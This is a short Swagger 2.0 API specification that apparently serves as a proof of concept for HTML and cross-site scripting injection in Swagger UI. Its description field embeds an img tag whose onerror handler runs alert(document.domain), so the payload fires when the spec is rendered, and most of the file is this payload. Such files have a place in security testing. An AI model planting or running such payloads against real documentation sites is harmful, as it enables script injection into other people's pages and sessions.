swagger: '2.0'
info:
  version: 1.0.0
  title: HTML Injection IMG injected
  description: '
        <h1>HTML Injection : IMG injected</h1>
        <img src=https://raw.githubusercontent.com/menevarad007/swagger-xss/main/savage.jpg onerror=alert(document.domain)>
    '
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
